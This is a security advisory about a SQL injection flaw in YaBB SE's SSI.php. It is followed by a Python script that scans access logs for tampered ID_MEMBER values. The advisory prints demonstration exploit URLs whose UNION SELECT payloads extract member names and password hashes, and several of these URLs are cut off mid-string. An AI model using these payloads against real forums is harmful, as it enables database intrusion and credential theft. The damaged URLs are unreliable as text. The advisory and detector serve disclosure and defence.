Description: An input validation vulnerability was reported in YaBB SE in 'SSI.php'. A remote user can inject SQL commands.
It is reported that the ID_MEMBER parameter is not properly validated by the 'recentTopics' and 'welcome' functions. A remote user can supply a specially crafted URL to execute SQL commands on the underlying database. Some demonstration exploit URLs are provided:
http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_ME
N+SELECT+ID_MEMBER,+memberName,null,passwd,null,passwd,null,null,null,null,null,null+FROM+yabbse_members+/*
http://[target]/yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=1)+LEFT+JOIN+yabbse_log_mark_read+AS+lmr+ON+(lmr.ID_BOARD=t.ID_BOARD+AND+lmr.ID_ME
ull,null+FROM+yabbse_members+/*
http://[target]/yabbse/SSI.php?function=welcome&username=evilhaxor&ID_MEMBER=1+OR+1=2)+GROUP+BY+readBy+UNION+SELECT+ASCII(SUBSTRING(realName,1,1)+)+
Impact: A remote user can execute arbitrary SQL commands on the underlying database. This can be exploited to view hashed passwords, for example.
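A defender-side check for this issue, added here as an example and not part of the advisory or of YaBB SE: it scans web-server access logs for requests to SSI.php whose 'function' is one of the two affected ones and whose ID_MEMBER value is not a plain integer. The log lines are constructed for illustration; the log format is assumed to be Apache combined/common style.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed sample access-log lines (not taken from the advisory). The second
# request mimics the advisory's shape: a non-numeric ID_MEMBER sent to recentTopics.
SAMPLE_LOG = """\
203.0.113.5 - - [01/Jan/2004:10:00:00 +0000] "GET /yabbse/SSI.php?function=recentTopics&ID_MEMBER=42 HTTP/1.0" 200 512
203.0.113.7 - - [01/Jan/2004:10:00:01 +0000] "GET /yabbse/SSI.php?function=recentTopics&ID_MEMBER=1+OR+1=2)+LEFT+JOIN+x+/* HTTP/1.0" 200 2048
203.0.113.9 - - [01/Jan/2004:10:00:02 +0000] "GET /yabbse/SSI.php?function=welcome&username=bob&ID_MEMBER=7 HTTP/1.0" 200 300
203.0.113.9 - - [01/Jan/2004:10:00:03 +0000] "GET /yabbse/index.php?board=1 HTTP/1.0" 200 900
"""

# Apache-style request line: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
# The two SSI.php functions the advisory names as affected.
VULN_FUNCS = {"recentTopics", "welcome"}


def is_suspicious(target):
    """True if the request hits an affected SSI.php function with a non-integer ID_MEMBER."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith("/ssi.php"):
        return False
    # parse_qs decodes '+' and %xx, so the check sees the value as the database would.
    qs = parse_qs(parts.query, keep_blank_values=True)
    if not VULN_FUNCS & set(qs.get("function", [])):
        return False
    # A legitimate member ID is a plain integer; anything else is a tampered value.
    return any(not v.isdigit() for v in qs.get("ID_MEMBER", []))


def scan_log(text):
    """Return (client_ip, decoded_target) for every suspicious request in the log text."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m and is_suspicious(m.group("target")):
            hits.append((m.group("ip"), unquote_plus(m.group("target"))))
    return hits


if __name__ == "__main__":
    for ip, target in scan_log(SAMPLE_LOG):
        print(f"{ip}: {target}")
```

The same integer-only rule is what a fix in the application should enforce before the value reaches the query; the log check only tells you whether someone already tried.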
Solution: The vendor has released a fixed version (1.5.5), available at:
http://www.yabbse.org/download.php